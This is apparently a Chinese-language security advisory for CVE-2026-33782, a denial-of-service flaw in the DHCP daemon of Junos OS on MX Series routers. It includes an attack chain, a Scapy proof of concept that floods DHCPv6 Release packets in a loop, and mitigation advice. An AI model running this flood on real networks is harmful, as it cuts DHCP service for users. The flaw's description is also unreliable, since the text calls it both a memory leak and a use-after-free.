CVE-2026-33782 Junos OS DHCPd内存泄漏致DoS漏洞

漏洞信息

漏洞编号

CVE-2026-33782

漏洞类型

内存泄漏

CVSS评分

6.5 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Juniper Networks Junos OS (MX Series)

漏洞概述

Juniper Networks Junos OS（MX系列）的DHCP守护进程存在内存释放后重用漏洞。在配置了DHCPv6 over PPPoE或VLAN并启用Active/Bulk lease query的环境中，未经认证的邻接攻击者可利用该漏洞，在用户登出时触发少量内存泄漏。持续攻击将耗尽设备内存，导致jdhcpd进程崩溃并重启，从而引发拒绝服务攻击，严重影响网络可用性。

技术细节

该漏洞源于Junos OS DHCP守护进程在处理特定DHCPv6会话释放时的逻辑错误。具体地，当系统配置为DHCPv6 over PPPoE或VLAN，并启用了Active lease query或Bulk lease query功能时，jdhcpd未能正确释放订阅者登出后分配的内存资源。攻击者无需身份验证，只需处于邻接网络位置，模拟大量合法用户进行“登录-登出”操作。每一次登出都会导致一小块内存无法回收，形成内存泄漏。由于内存泄漏是累积性的，经过长时间或高频率的触发，系统可用内存将被耗尽，最终导致jdhcpd进程因内存不足而崩溃并自动重启。在进程恢复期间，所有DHCP服务将中断，造成严重的拒绝服务。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标网络中的Juniper MX Series设备，并确认其运行了受影响版本的Junos OS，且配置了DHCPv6 over PPPoE/VLAN及Active/Bulk lease query功能。

STEP 2

Exploitation

攻击者作为邻接网络中的未认证用户，向目标DHCPv6服务发送大量精心构造的DHCPv6 Release（释放）或模拟用户登出报文。

STEP 3

Resource Exhaustion

由于漏洞存在，jdhcpd进程在处理每个登出请求时未能正确释放内存，导致内存泄漏逐渐累积，系统可用内存持续减少。

STEP 4

Denial of Service

当内存耗尽时，jdhcpd进程崩溃并尝试重启。在重启期间，DHCP服务完全不可用，导致网络中的新用户无法获取IP地址，现有用户连接中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import time
from scapy.all import *

# Target Configuration
# Replace with the actual MAC and interface of the target environment
target_mac = "00:11:22:33:44:55"
interface = "eth0"

# Construct Ethernet and IPv6 headers
eth = Ether(dst=target_mac)
ipv6 = IPv6(dst="ff02::1:2") # DHCPv6 All_DHCP_Relay_Agents_and_Servers

# Construct UDP header for DHCPv6 (Client port 546 -> Server port 547)
udp = UDP(sport=546, dport=547)

# DHCPv6 Release Message (MsgType 8)
# This simulates a subscriber logging out/releasing the lease
dhcp6_release = DHCP6(msgtype=8)

# Add necessary options (Simplified for PoC demonstration)
# In a real scenario, valid ServerID (Option 2) and ClientID (Option 1) are required
dhcp6_release = dhcp6_release / DHCP6OptServerID(duid=DUID_LL(lladdr="aa:bb:cc:dd:ee:ff"))
dhcp6_release = dhcp6_release / DHCP6OptClientID(duid=DUID_LL(lladdr="11:22:33:44:55:66"))

# Assemble the full packet
packet = eth / ipv6 / udp / dhcp6_release

print("[*] Starting PoC for CVE-2026-33782...")
print("[*] Sending DHCPv6 Release packets to trigger memory leak...")

try:
    while True:
        # Send the crafted packet
        sendp(packet, iface=interface, verbose=0)
        print("[+] Sent one DHCPv6 Release packet")
        # Wait briefly to simulate subscriber logout interval
        time.sleep(0.5)
except KeyboardInterrupt:
    print("\n[*] PoC execution stopped by user.")

影响范围

Junos OS all versions before 22.4R3-S1

Junos OS 23.2 versions before 23.2R2

Junos OS 23.4 versions before 23.4R2

防御指南

临时缓解措施

在无法立即升级的情况下，管理员可以使用命令 'show system processes extensive | match jdhcpd' 密切监控jdhcpd的内存使用情况。如果内存使用量异常持续增长，建议手动重启进程或设备以暂时恢复服务。此外，评估网络环境中是否必须使用Active lease query或Bulk lease query功能，如非必要，可尝试临时禁用以降低攻击面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-33782
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-33782
3 Details https://www.cvedetails.com/cve/CVE-2026-33782/
4 VulDB https://vuldb.com/cve/CVE-2026-33782
5 Link https://kb.juniper.net/JSA107820